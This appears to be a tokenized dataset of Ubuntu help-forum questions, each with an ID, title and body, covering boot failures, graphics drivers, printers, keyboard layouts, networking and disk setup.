open device `ttyusb0 ' : no such file or directory update 2 : i managed to make statserial work ( the sense of this thread will collapse i guess ) : first you have to reset the port and then establish a hard link to a ttys*-port with a higher number than the number of standard ports are : sudo rm /dev/ttys40 sudo ln /dev/ttyusb0 /dev/ttys40 but how can i copy the data displayed in terminal into any object i can read with selfmade code ? and why is the statserial-tool reacting so slowly to changed staus lines ?
471824	ubuntu 14.04 lts wo n't install on my old toshiba satellite m30-404 !	i 'm trying to install ubuntu on my old toshiba ( 10+ ) , but it wo n't boot from a cd or from a removable disk . i 've also changed the boot order in bios ... nothing ! . i 've also tried wubi , but when wubi installs the `` cd boot helper '' , afterwards theres an error because of an corrupted bootloader ... ( sry for my bad english ! ) . toshiba satellite m30-404 : os version : win xp bios version : 1.70 cpu : intel ( r ) pentium ( r ) m processor 1500mhz memory : 512mb ram hard disk capacity : 60gb is my toshiba to old for ubuntu 14.04 lts ?
471825	dropbox icon disappears only for some users , while dropbox still loads	on ubuntu 12.04 i have two users : for both dropbox is installed and starts when logging in , but only one of the two can see the actual ( white ) dropbox icon in top right tray : what is the problem with the other one ?
471829	ssh behind a nat enabled router	i have a netgear router , and i installed openssh , now when i try ssh deadman @ 192.168.0.4 my ssh works fine and i am able to enter to the ssh terminal but when i try it with a remote terminal like ssh deadman @ 117.192.213.115 i dont see anything , if i try deadman -w deadman @ 117.192.213.115 i get bad stdio forwarding specification 'deadman @ 117.192.213.115' note that 117.192.213.115 is my routers ip - and in my router settings i have enabled port forwarding -
471830	hud not working in libreoffice downloaded from libreoffice.org	as i want all the latest software for my computer , i downloaded libreoffice from the site , not from software center . i followed the instructions on how to install it . i have only one problem.the alt function , which has the ability of fast finding the meny entru or function inside the program , does not work . here 's example of that function in chrome : however , if i do that in libre office , i get nothing : any ideas ?
471831	ubuntu does not start after update - can not recover data	i recently updated my notebook system to ubuntu 14.04 and facing the following issue : 1 ) on startup : the system starts , i can input my encryption password for the harddrive , but then before getting to the login screen i get the following errormessage : '' the system is running in low-graphics mode . your screen setttings , graphics card and input device settings could not be detected correctly . you will need to configure these yourself . '' 2 ) i press the enter button and a second message appears '' what would you like to do ? '' however , no options are displayed . i can only guess and pressed several times the ok or cancel button . 3 ) two things happen , either shutdown of the notebook . or i get two message lines : '' [ sbd ] assuming drive cache : write through '' followed by : '' [ sdb ] asking for cache data failed '' i have tried also the following : i put a bootable iso image on a usb key and boot from usb . i chose not to install but start the notebook in trial mode i can not get access to the documents ( like bookmarks , spreadsheets , pdf files ) stored in the superuser account even though it asks me for the password . after typing it it gives me an error message and i do n't get access to the documents . however , i can decrypt the harddrive and get access to the documents ( like bookmarks , spreadsheets , pdf files ) stored in the guest account if i could recover the documents i then would just reinstall ubuntu well , i learned one lesson so far : make more regular back-ups as the last one is 5 months ago can anyone please help me with either getting the system running or how to recover my data on my sudo account ( not guest as i have done so already ) ? i am only running ubuntu on my netbook . i am not running a dual-boot system . many thanks for your help . lochfynne
471835	ubuntu and windows 8.1 dual boot gpt	i have ubuntu 14.04 installed and i want to install windows8.1 . i have created a partition for windows . i have a separate boot partition but i heard i needed a efi partition.i still have 300mb unallocated space at the start of the disk . what should i do ?
471837	when is disk fragmentation an issue and how does one fix it ?	my ext4 drive recently filled up to 95 percent capacity before i cleared out space on my disk . while transferring files from my computer to an external hard drive , i noticed a lot of my oldest media transferred fairly quickly , while some of the newer material was copying at a much slower rate . ( it also seemed to stall or pause often . ) could this be due to fragmentation ? if so , what is the optimal solution for maintaining good disk health ?
471841	2nd monitor does n't work properly ( only tty mode ) in 14.04	i had ubuntu 14.04 installed and was using two monitors . nvidia gtx 760 and integrated intel hd 4000 , both with vga . on a fresh install all is [ ok ] , but on main monitor ( gtx 760 ) i had a blinking cursor . then i installed the official drivers ( 331.67 ) from nvidia homepage . after rebooting the os my 2nd monitor only shows tty-terminal mode ctrl+alt+f1 and the ubuntu logo . on main all is [ ok ] . how can i fix the issue , with the 2nd monitor ? ! -- please help ! !
471843	how to extract multiple zipped and rar files recursively ?	i have a folder examplefolder which contains many zipped folders . these zipped folders also contains multiple zipped folders . how to go through examplefolder and extract all of its zipped folders recursively ? note that examplefolder itself , is not zipped , it 's just a normal folder okay now i know what 's happening rinzwind and nux answers are both correct ( except that i have to keep pressing y or a forever ) but it 's seems that some of the zipped files , contained zipped files and rar files as well , the rar files will not be extracted by while [ `` `find . -type f -name '*.zip ' | wc -l` '' -gt 0 ] ; do find -type f -name `` *.zip '' -exec unzip -- ' { } ' \ ; -exec rm -- ' { } ' \ ; ; done or whatever edit 2 some files are named .r00 and r01 , .r02 up to r14 , they are rar files , but not .rar
471845	upgrade to 14.04 now ca n't get past login and ca n't get into recovery mode	i just upgraded to 14.04 and it seems to have broken the system quite impressively . i get a login screen but if i login then i see part of my desktop background , no icons or toolbar or anything else and the keyboard does n't seem to do much : ca n't bring up a terminal . there is a mouse pointer which moves but nothing else . i suspect this is to do with the nvidia graphics card , but i ca n't get in to fix it . in the meantime , i ca n't get into recovery mode either : pressing shift during startup does n't seem to make any difference . obviously all a little frustrating : can anyone advise ? am not in any way a linux guru so apologies if i 've done anything stupid . rob
471847	brightness fn key shortcut does n't work on asus laptop	the brightness shortcuts via fn key do n't work . i tried each solution from this answer and its comments . after editing /etc/default/grub file i rebooted . grub_cmdline_linux= '' acpi_osi=linux '' grub_cmdline_linux= '' acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_osi=linux acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_osi_linux '' what other workarounds/solutions are there ? relevant output : $ sudo lshw -c display *-display unclaimed description : 3d controller product : gk107m [ geforce gt 750m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f6000000-f6ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff *-display description : vga compatible controller product : 4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:50 memory : f7400000-f77fffff memory : d0000000-dfffffff ioport : f000 ( size=64 )
471848	recompiling ubuntu problem	i want to use fault_injection framework . when i use this script : ./failcmd.sh it show this error : failslab not available so i want to enable fault_injection with menuconfig after change .config , i want to recompile kernel . but it show this error : make [ 1 ] : *** no rule to make target `/usr/src/kernels/linux-headers-3.13.0-24/x86/syscalls/syscall_32.tbl ' , needed by `arch/x86/syscalls/../include/generated/uapi/asm/unistd_32.h ' . stop i 've tried to update headers too . but i 've this problem yet how to solve this ?
471849	change keyboard layout permanently in xubuntu 14.04	i have a fresh xubuntu 14.04 trusty thar installation ( not upgrade ) and i need to change my keyboard layout each time i boot . these are the contents of file /etc/default/keyboard : xkbmodel= '' pc105 '' xkblayout= '' es '' xkbvariant= '' cat '' xkboptions= '' terminate : ctrl_alt_bksp '' it seems correct to me , but the layout does not follow this file . method # 1 tried to apply configuration permanently each time i boot i got us keyboard layout . if i do : sudo dpkg-reconfigure keyboard-configuration all the options that appear are the desired ones : generic 105-key ( intl ) pc spanish spanish - catalan ( spain , with middle-dot l ) the default for the keyboard layout no compose key yes but each time i boot the machine i get us layout again . output of command is : your console font configuration will be updated the next time your system boots . if you want to update it now , run 'setupcon ' from a virtual console . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ( 0.103ubuntu4.1 ) ... update-initramfs : generating /boot/initrd.img-3.13.0-27-generic method # 2 tried to apply configuration permanently in my settings- > keyboard- > layout i have ticked the checkbox use system defaults . if a change to this configuration : the configuration is applied , but when i reboot i get us layout again . settings in this windows are permanent , but keyboard layout is us each time i reboot : - $ how can i change my keyboard layout permanently ? it 's being annoying ...
471850	ubuntu 14 go black screen after my video card fail	my video card suddenly fail while i was playing game in windows . after that the system can not recognize the video card . when i boot the system with ubuntu , after passing the ubuntu logo , it only displays a black screen with a password entering dialog . the system is still reaponing , as i can type in the password but nothing show up after that . there is a intel onboard display in my motherboard . i suppose the problem the problem is ubuntu can not automatically switch diaplay card driver to onboard display when my video card fails i have tried sudo apt-get purge nvidia* to uninstall the nvidia driver but it did n't work could anyone give me a solution ? thanks a lot
471852	which sound cards below are supported on ubuntu 13.10 ?	i 'm currently evaluating the following listed sound cards as possible replacement/addition for my onboard hda sound ( card ) . creative sound blaster vx creative sound blaster audigy 7.1 creative sound blaster z creative sound blaster x-fi xtreme audio creative sound blaster recon3d asus xonar dgx asus xonar dsx
471854	ca n't install ubuntu to asus mainboard	socket 771 dsbf-d12 with two e5420 xeon live cd 10.10 , 12.10 13.1o all this lives cd makes my pc to reboot state if i try to boot it or install it . with one cpu i can see log ... it says something kernel panic cpuid error ... . with e5320 i did not have this problem . what to do.. more important moment that windows installs without any problems ... xp and 7 i checked ...
471855	share the internet connestion over bluetooth ( ubuntu gnome )	i wanted to create a wi-fi hotspot , to share my internet connection to an android tablet , but that seems to be impossible , as the connection disconnects when i activate the hotspot . therefore i would like to share my internet connection via bluetooth instead . i have tried this but as i do not use unity , i could not find the bluetooth icons . how can i do that with ubuntu gnome ?
471856	force mousepad to block terminal	i 'm using mousepad as my default editor . however , recently mousepad does not block the terminal when it has been called up from there . how can i restore this behavior ?
471857	how to uninstall facebook messenger from ubuntu 14.04 ?	recently i installed facebook messenger in my ubuntu 14.04 and then i noticed that it is no longer supported in ubuntu . so i tried to uninstall it . when i checked software center i ca n't find an entry for facebook messenger there . the following are the commands i used to install facebook messenger : sudo add-apt-repository ppa : nilarimogard/webupd8 sudo apt-get update sudo apt-get install fbmessenger so how can i uninstall facebook messenger ?
471858	are there drivers for opengl 4.3 for [ amd/ati ] seymour [ radeon hd 6400m/7400m series ] ( ubuntu 14.04 )	i want to be able to do opengl4.3 c/c++ programming , the [ amd/ati ] seymour [ radeon hd 6400m/7400m series ] should be able to support it , i just do n't know what drivers i have to install also i have installed the propriety driver ( using video driver for the amd graphics accelerators from fglrx )
471862	all applications disappear in the dash	after installing the latest update , all my applications disappear in the dash ? it always show me : sorry , there is noting that matches yours search . why ? how to fix it ? thank you for your help .
471864	how to split the contents of a file ?	i have a text file which contains exactly thousand lines . i want to split the file into 1000 different files by writing each line to a separate text file . and i want the name of splitted files to be in a sequential order . example : foo.txt file contains , foo bar ... ... lastfoo first splitted file must contain only a single line foo and it 's name would be bar1.txt . and the second file must contain only a single line bar and it 's name would be bar2.txt likewise for the last file should contain a line lastfoo and the name of the last file would be bar1000.txt . command-line ( one liner ) way would be better rather than a script way .
471869	grub rescue prompt ( file not found ) after update 12.04 lts - 14.04 lts through update manager	i am an old user but i lost my credential and so i signed up again . here is my issue ( that i am already trying to solve on my own but i need further help please ) : i had a dual boot windows7ultimate/ubuntu 12.04 lts on two separate hd on my laptop . using grub for the boot ( where i could choose between ubuntu etc and win7 ) tried to update to 14.04 directly in the update manager ( new release available etc.. ) after the reboot i had the message : file not found grub rescue > _ looking for a solution online ( and here ) i did : 1 - used livecd to reinstall ubuntu 12.04 lts ( twice ! ) -- - > same error 2 - set prefix= ( hd1 , msdos7 ) /boot/grub insmod normal normal -- - > i manage to start win7 and ubuntu but now i have in the `` ubuntu hd '' two `` ubuntu 12.04 lts '' with of course space `` issues '' ( i mean i am not using my hd space properly if i keep a duplicate ) and i have to type every time `` set prefix etc . '' to start the grub . i simply would to have hd1 - win7 hd2 - ubuntu 14.04 lts ( only , so clean installation from zero - i have got the iso ) note : i found difficult maybe to install properly ubuntu when the system asked me for the three options like install alongside other os , clean all the os , something different ... because i have the error '' no root file system is defined '' another problem is that i was not able to access to my wireless internet network through the livecd and i dont have chance to use a direct usb wire , so please take this in consideration too . hope someone could help me . thanks to all .
471874	partitioned memory stick only works on ubuntu	please note : i 've been looking through the `` questions that may already have your answer '' but none of help . i attempted to partition a memory stick to make a separate drive for portableapps , but it seems the second partition on the memory stick only appears on my ubuntu system . and on windows only my 1st partition appears .
471877	what happened to chmsee in 14.04 ?	i 've been a happy user of chmsee since the awesome 10.10 to view and read my chm ebooks . today i tried to install chmsee on my xubuntu machine , but both apt-get and the software center were unable to find the package ! i searched for the package and shockingly it seems that chmsee is no longer available as of ubuntu 14.04 trusty . is this true ? why would anyone want to remove such a perfectly usable and functional application ? update : since the chmsee package is long gone from the official repos of 14.04-trusty , what matters more is how can a user of 14.04 install and have this awesome application back . so i 'm updating the question to also ask for a nice way to install and use chmsee on ubuntu-14.04 trusty . from 'nice ' i mean a way with very few effort and least harm to the system . i do n't like adding entire new repositories just to install one app !
471879	mouse cursor stops working when placing block in minecraft	this question might seem really weird . i have made a mod for mine craft and it works fine on my windows laptop . the problem is i have made a multi block structure and when i place the last block in the structure the mouse disappears and stops working . i can still use my keyboard which and switch between workspaces . this is really weird ... i hope you can help me : d nomis
471882	how do i remove a rar file that has stuck on the applications/places toolbar ?	i was moving a rar file to another place when it stuck on the bottom toolbar , see screenshot below . right click only shows 'launch ' and 'properties ' options , no delete option is available . running ubuntu 12.04 , 64 bit .
471886	changed the boot order using grub now windows 8.1 wont start	i wanted windows 8.1 first in boot order so i installed the grub using this method and used grub to change the order now windows 8.1 wont start it just blink and comes to the selection of os screen again , now i can only run ubuntu . how i can solve this problem ? edit the /boot/grub/grub.cfg file output http : //textuploader.com/9jhw sudo update-grub output is generating grub configuration file ... found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic found memtest86+ image : /boot/memtest86+.elf found memtest86+ image : /boot/memtest86+.bin found windows 8 ( loader ) on /dev/sda1 done using ubuntu 14.04 lts i tried to revert it too using the grub customizer but it does the same thing .
471887	ubuntu installation problem	i 'm trying to install ubuntu ( 64bit amd ) alongside windows 7 , from bootable sandisc usb flash , but when i am trying to choose 'try ubuntu ' or 'install ubuntu ' its stoped on black screen with hide and show horizontal cursor and do nothing . i tried 13.10 , 14.04 but the same problem . please reply to me soon with the soluition . thanks in advance . ps : my laptop ram was 3gb but i increased it to 4gb . my laptop : asus : model x61s , 4gb ram , windows 7 64bit , processor intel ( r ) .
471889	canon lbp2900 printer installed , but does not print , only piles up in print queue	i installed canon lbp2900 printer on ubuntu 12.04 , 32 bit machine , 14.04 also does not work . i used following documents as reference while installing . how to install canon lbp2900 printer in ubuntu 12.10 how do i install drivers for a canon lbp-2900 printer ? the computer detects printer when it is turned on but when print command is issued , it piles up in print queue but , it does not print . what to do ? please help . following are some details that might help when sudo service ccpd status command is issued it gives following output /usr/sbin/ccpd : 3014 3013 when running sudo ccpadmin , following output is displayed usage : ccpdadmin [ -p printer-name -o printer-dev-path ] ccpdadmin [ -x remove-printer-name ] cups_configpath = /etc/cups/ log path = none ui port = 59787 entry num : spoole : backend : fifo path : device path : status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - [ 0 ] : lbp2900 : ccp : /var/ccpd/fifo0 : /dev/usb/lp0 : the file /etc/cups/printers.conf contains following < printer canon-lbp2900 > uuid urn : uuid:5d029791-c96c-3cd4-5388-49407f60245c info canon lbp2900 location bpwagley-desktop makemodel canon lbp2900 capt ver.1.5 deviceuri usb : //canon/lbp2900 ? serial=0000d2e2cls6 state idle statetime 1401019123 type 8392836 accepting yes shared yes jobsheets none none quotaperiod 0 pagelimit 0 klimit 0 oppolicy default errorpolicy retry-job < /printer > < defaultprinter lbp2900 > uuid urn : uuid:0760bb04-e8cc-3599-4984-7cc61ffa8033 info canon lbp2900 location bpwagley-desktop makemodel canon lbp2900 capt ver.1.5 deviceuri ccp : /var/ccpd/fifo0 state idle statetime 1401019105 type 8392836 accepting yes shared yes jobsheets none none quotaperiod 0 pagelimit 0 klimit 0 oppolicy default errorpolicy retry-job < /printer >
471893	ubuntu not allowing me to factory reset	i 'm on ubuntu 14.04 and i am using an hp pavilion notebook pc . i downloaded ubuntu by booting from usb and replaced vista with ubuntu . i found out about playonlinux but i was just left unsatisfied by it 's performance . i have decided to do a factory reset and use vista ( factory os ) as my gaming platform and ubuntu as the platform for everything else . the problem is that when i boot , i press f11 ( the key for recovery ) and nothing at all happens . it works for the other keys like f9 ( bios ) and f10 ( other settings ) , but not on f11 . it then goes straight to grub . i would like to go back to my factory settings , any help would be highly appreciated .
471895	restoring ubuntu system	i had messed up my system running ubuntu and windows 7 and windows 8 . i was not able to boot into ubuntu while i was could boot into windows . so i uninstalled ubuntu through a live usb , but before that i backed up the user folder , now i have re installed ubuntu , is there a way i can restore my programs and settings through this folder or is it useless ?
471898	transfer a wubi installation into unallocated space	i have a wubi based installation of ubuntu 14.04 . now that i 'm comfortable with using ubuntu , i want to move it out of the windows file system . here 's a picture of gparted running within my wubi installation . as you can see below , currently ubuntu is installed in `` chintoo 's disk '' . i have 60.06 gb of unallocated space , into which i want to transfer the current wubi based ubuntu installation . so , my question is : how do i move a wubi installation into unallocated disk space while keeping dual-boot and all the data from my wubi installation intact . note : this is most likely already answered somewhere on this site , but i ca n't find the relevant post .
471899	can rhythmbox sync to a subfolder of my android phone ?	i 'd like to try using rhythmbox to sync my music . i created the `` .is_music_player '' file on the root of the microsd so it is detected by rhythmbox and i can sync my music . but when i sync , it syncs to the root of the microsd ! is there any way to sync to the `` music '' subfolder instead ?
471901	how to reset login background and notifications after installing xfce	to get remote desktop working i installed xfce on ubuntu 14.04 . it modified os title to xubuntu in startup . and also i get xfce login wallpaper and xfce notifications . how can i restore them ?
471902	nvidia x server settings showing blank error	i 'm using ubuntu 14.04 and i have nvidia gf119m and intel速 ivybridge mobile x86/mmx/sse2 on me . i tried to switch my card to nvidia , but an error appeared and its blank . how do i get my nvidia to work ?
471905	problem downloading shutter in 12.04	when i click `` download '' shutter for v12.04 in ubuntu softwarecenter , a window of launch application pops up stating : `` this link needs to be opened with an application '' . i have no clue which application that may be . do you ?
471906	gtk-warning ** : can not open display : on ubuntu server	i 've simply been trying to get sublime text 2 running on ubuntu server 14.04 lts on a virtual machine but also get the same error trying to run gedit so this leads me to believe it 's an environment config issue . gtk-warning ** : can not open display : i 've installed gksu and tried gksu gedit with the same result . it 's really starting to hurt my head . any suggestions/help much appreciated ?
471911	lubuntu network manager cumbersome	i 've managed to connect my netbook to my home wireless , but i find the process cumbersome . is there a way to have the system identify open wireless networks without me having to know the name ? i ask because , if i 'm going to be working in a cafe or at school it would be nice for me to just be able to pull the name off a list .
471912	zram vs zswap vs zcache ultimate guide : when to use which one	what the hell are they ? how are they different ( i 've written my understanding in an answer below ) in the zswap system , when a page is evicted from the zswap to the actual swap is it stored in a compressed from ? ( or is it decompressed before storing ? , afaict it is still compressed but i ca n't be sure ) what is the current state of zcache ? it was apparently removed or something in 3.11 . what does this mean ? ( http : //git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/ ? id=96256460487387d28b8398033928e06eb9e428f7 )
471916	ora-12170 : tns : connect timeout occurred on the same host as db	i just installed oracle on my ubuntu 12.4 following the instructions provided here : http : //www.makina-corpus.org/blog/howto-install-oracle-11g-ubuntu-linux-1204-precise-pangolin-64bits and here : https : //community.oracle.com/thread/2461988 however , when i try to log on to the database that was created during the install using sqlplus , it hangs for a minute or two until it errors out with : ora-12170 : tns : connect timeout occurred . my tnsnames.ora : mysid = ( description = ( address = ( protocol = tcp ) ( host = my_host ) ( port = 1521 ) ) ( connect_data = ( server = dedicated ) ( service_name = mysid ) ) ) i verified that the listener is running and listening at the post 1521 : s $ sudo netstat -tulpn|grep 1521 tcp6 0 0 : ::1521 : : : * listen 16732/tnslsnr $ ps -ef|grep 16732 oracle 16732 1 0 06:58 ? 00:00:00 /opt/oracle/product/11.2.0/dbhome_1/bin/tnslsnr listener -inherit thoughts ?
471920	ssl connection to apache web server	i follow up on setting up ssl connection to my apache2 it works well when i access my website from a local ip address but if i use a dynamic dns service with https in the beginning than i does n't get to the website but actually can see my website folders . what have i done wrong ?
471921	finding some files and sorting the result by size and copy it to folder	well i want to use the cmd `` find '' to search some files and in the same time i want to sort the result by size sudo find ~ -name $ i -exec du -sh { } \ ; | sort -nr | head -1 i used the cmd `` du '' for the sizes and `` sort '' to sort the sizes from the highest to the lowest but it does n't work , can someone help me please . and i want at the end to copy the result of my research to a folder so i used : cp ` find ~ -type f -name $ i -exec du -sk { } \ ; | sort -nr | head -1 ` the_directory so this one i used , is to copy the file with the highest size but it does n't work .
471926	black blank screen after restarting , but after logout the screen resumes to the way it was	i have recently installed ubuntu 14.04 then following some webpages from internet i tried o install a couple of softwares including - gnome by sudo apt-get install gnome-shell ubuntu-gnome-desktop and then sudo add-apt-repository ppa : tiheum/equinox sudo apt-get update & & sudo apt-get install faience-theme faience-icon-theme but then when i restarted i got a black blank screen with nothing visible at all apart from launcher on left . could not see dashboard , or workspaces or anything . but strangely after i logout and then log back in the sceen comes alive - i have two screenshots showing the two scenarios - now i already removed gnome shell sudo apt-get autoremove gnome-shell and then the faience theme but still the fault exists any suggestions please ?
471928	internet connection unstable	i just installed ubuntu 14.04 and tried to connect to the internet . the problem is , every time i connect to the internet it tries to connect then disconnects and repeats over and over . on my imac , the internet works . so , i guess its my laptop . i 'm currently using ethernet . please help me !
471930	copy+paste problem from root to partition folder	i am trying to copy some folders from my portable hard drive to one of the partitions . the paste button is not working in the destination folder and whenever i am trying a drag-drop with my mouse , it says that i do n't have permission to create there , albeit i have the root . even the new folder button is not working . so , i 'm now performing this copy paste action by opening a terminal and running gksudo nautilus but its a one time option . if i further want to copy paste , again i need to open terminal and type the code . i dont want to do that every time.is there any permanent option/process ?
471931	recuperate usable space nexus 5	the question how to restore the full capacity of the disk space on my nexus 5 . mine default disk space is 32 gb , but after i installed ubuntu touch and then returned original rom my disk space is no longer 32 gigabytes , and now is a 26.7 gigabytes . how to restore its 32 gigabytes ? i tried all the recommendations described in the instruction , but it does not work . thanks in advance for your help !
471932	/ on ssd , should i put /var on a hdd ?	i 've recently just installed ubuntu 14.04 and i 'm still very new to linux/ubuntu . i 've got a laptop in which i have installed an 120gb ssd and a 750gb hdd . currently , i have ubuntu installed on the ssd and mounted the hdd through fstab to /mnt/var . now the thing is i want to have programs installed on the hdd and keep the ssd clean for ubuntu . as far as i understand programs are installed in the /var directory , and so i have been trying to copy the current data from /var to /mnt/var and then editing fstab to mount the hdd to /var . but whenever i reboot i get alot of different issues . first it said it couldn find drivers etc . than after another try doing it a bit different it just plainly could n't find /var . so my question here is , and i 'm sorry if this has been asked before but i followed a bunch of different guides and none worked for me , how do i properly set it up they way i want ?
471934	software center disappearing and noy loading	i 'm new to linux and am using ubuntu 14.0.4 . i wanted to install kerio vpn client from one of the sites so i downloaded it and when i double click on the zip folder it opened with software center . i clicked on install , but it took a long time to finish but the software center stopped and changed to gray . i closed it and restarted my laptop but when i turn it again i saw that software center is just gone . i tried different things like the sudo apt-get command for installing/reinstalling the software center but an error appears : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i dont know what to do ! ! ! !
471935	dual-screen instead of only one screen	since the upgrade from ubuntu 13.10 to 14.04 , i have problems with my screens . my video card is a radeon hd 7870 , it uses the fglrx-updates driver . my main screen is a 24 '' with a resolution of 1920ă1200 and the video card is also connected to a 50 '' 1080p tv . i want to use only the 24 '' screen at boot , i use xrandr to display the image on both screens when needed . after the upgrade , ubuntu displayed the desktop on both screens in extended desktop mode . the size of all the text was bigger , it was ugly . i searched a solution to this problem and found someone who suggested to use amdcccle in order to define the screen settings . so i configured the 24 '' as the only screen in amdcccle and rebooted . now the problem is still present , after every reboot the desktop is displayed in extended desktop mode on both screens , but the text is not zoomed like before using amdcccle . the problem is the same if i use the screen configuration tool integrated in gnome shell . i can use xrandr at the start of my session to force the resolution but i 'm looking for a direct solution . update as suggested in the comments i switched to the open-source drivers . after a reboot the dual-screen is still activated : once i deactivate the tv the display is correct except the window titles which are big : update 2 this behaviour is random , sometimes the text is not zoomed .
471940	grub does n't show windows 8 as boot option	i only had windows 8 installed before . so i made a new partition and installed ubuntu on it . while installing it told me that there is no root filesystem , so in the partition-menu i selected the partition and gave it `` / '' as mount point ( or whatever it 's called ) . ubuntu went through the installation but now it justs starts ubuntu whenever i boot my computer - the windows partition is still there , same as the system-reserved stuff and i can even access my files from ubuntu . is there any way to get an option menu when i boot to get back to windows 8 ?
471942	hp deskjet 1050 worked with ubuntu 13.04 but not printing with 14.04	i have a hp deskjet 1050 ( all-in-one ) which previously worked fine on ubuntu 13.04 but since upgrading to 14.04 i 'm having problems . i re-installed hplip , now on version hplp-3.14.4 . all seemed to go fine but i still ca n't print . what should i do now - has anyone else got the same problem ?
471943	lenovo yoga 2 ubuntu 14.04 occasionanal blank screen	i have a new lenovo yoga 2 with ubuntu 14.04 . on every 3rd or 4th boot , the screen goes completely blank after the grub screen and the backlight seems to ramp up to maximum intensity ( i see a faint growing white glow ) . i can hear the drums beat for the login , but nothing shows up on the screen . this seems to be random -- i can not figure out a way to bypass this without rebooting several times . it also seems to randomly happen while waking up from suspend . i have the acpi_backlight = vendor in the grub boot line . this does not seem to make a difference as i get this random behaviour with and without the boot flag . -- prasanna
471949	in the partitioning step , when selecting `` installing alongside '' i 'm redirected to windows	at first i downloaded ubuntu 14.04 lts from the website . i have the iso format downloaded . the next thing i did was to write it in a dvd . then took it for the process of installation from boot cd . it went well until the point of asking for installing alongside windows . but after that option is clicked , rather than asking for partition space , i 'm being redirected to windows . i need a dual boot whilst stuck with the installation process . kindly out .
471954	how i can type in english and persian ( farsi ) combined in abiword ?	as you may know persian has a right to left writing . when i try to type in abiword in english and persian combined , english words have been reversed . hear is a sample : it types `` utnubul سیستم عامل xunil می توان '' when i want to type `` lubuntu سیستم عامل linux می توان '' .this problem remains even when i first complete the persian text and then try to add english words . my operating system is lubuntu 14.04 .
471959	wifi continuously connects and disconnects and after computer crash	i 'm a beginner on the linux world . last day i 've installed ubuntu 14.04 lts on my desktop . this pc is connect to home network ( where are other 2 computers with windows 7 ) via usb netgear wifi adapter n150 wna1100 to a router netgear dgn1000 . the issue is that the pc continuously connect and disconnect from internet and after crash the pc .
471960	make wired device connected to eth0 visible on wireless network wlan0	my network uses the wireless router that came with the cable company . it is not the greatest router but is my only option at this time . i recently received a playstation 4 as a gift , and unfortunately the wireless chip in my ps4 only gets along with the wireless chip in my router if wireless n is turned off , ( this information discovered by communications with other people having the same problem . ) unfortunately , the software my cable company has on the router does not allow me to disable the wireless n. the ps4 shares a desk with my computer , so i plugged the ps4 into my computer 's ethernet port , selected `` shared to other computers '' in the wired connection in network manager ( running kubuntu 14.04 ) and everything worked perfectly . the ps4 is assigned address 10.42.0.29 on network 10.42.0.0/255.255.255.0 ; my computer is 10.0.0.9 on the wireless network which is 10.0.0.0/255.255.255.0 . ( i have n't done much networking setup work for almost 20 years so pardon me please if my terminology is a little off . ) the ps4 is not visible to other computers on my network , but that did n't seem a problem and everything worked fine so i was happy . then yesterday i attempted to connect the playstation app on my tablet with the ps4 ; unfortunately my tablet is obviously on the wireless network and therefore could not see the ps4 . it 's a little embarrassing as 20 years ago i was setting up linux routers as part of my job ; but i guess it 's not like riding a bike because as i read various networking pages on the internet it 's all completely unfamiliar . all the pages i 've been able to find ( and understand ) do not bother with trying to make the wired device visible to devices on the wireless network . my first impulse was to try changing the netmask of the wireless network to 255.0.0.0 just to see if it work work ; but the junk router only offers 255.255.255.0 and 255.255.0.0 as options . i then tried playing around with setting up a bridge interface , but i only succeeded in knocking my computer off the wireless network completely . anyhow , is there any way to make it so that the ps4 appears to the network as though it were a device on the wireless network , or at least has an ip address that is visible from the wireless network ? if it helps , this is the output of ifconfig : eth0 link encap : ethernet hwaddr 00:21:9b:03:3f : ad inet addr:10.42.0.1 bcast:10.42.0.255 mask:255.255.255.0 inet6 addr : fe80 : :221:9bff : fe03:3fad/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4666 errors:0 dropped:0 overruns:0 frame:0 tx packets:4482 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:700066 ( 700.0 kb ) tx bytes:3927639 ( 3.9 mb ) interrupt:20 memory : fdfc0000-fdfe0000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2211 errors:0 dropped:0 overruns:0 frame:0 tx packets:2211 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:212468 ( 212.4 kb ) tx bytes:212468 ( 212.4 kb ) wlan0 link encap : ethernet hwaddr ec:1a:59 : b5:51:42 inet addr:10.0.0.9 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : 2601:2:2680:1bb:11ba:3440 : ceaa:3d79/64 scope : global inet6 addr : 2601:2:2680:1bb : ee1a:59ff : feb5:5142/64 scope : global inet6 addr : fe80 : :ee1a:59ff : feb5:5142/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:12042 errors:0 dropped:2147 overruns:0 frame:0 tx packets:11932 errors:0 dropped:3 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6930538 ( 6.9 mb ) tx bytes:2400091 ( 2.4 mb )
471962	i am in sudo group . yet i can not do sudo commands	i have added myself to the sudo group . yet when i try to perform a sudo command , the error that says user not in sudoers group still pops up . please help !
471965	is there a way to display the effective apache2 config file ( with respect to include and conditional directives ) ?	i 've been wondering if there 's a possiblity to display all parts of an apache2 configuation of ( eventual ) numberous configuration files with are ( conditionally ) included ( it would make sense to have a program which you can pass the conditions like you would pass them to apache2 ) . i have something similar to the function of effective pom in maven in mind .
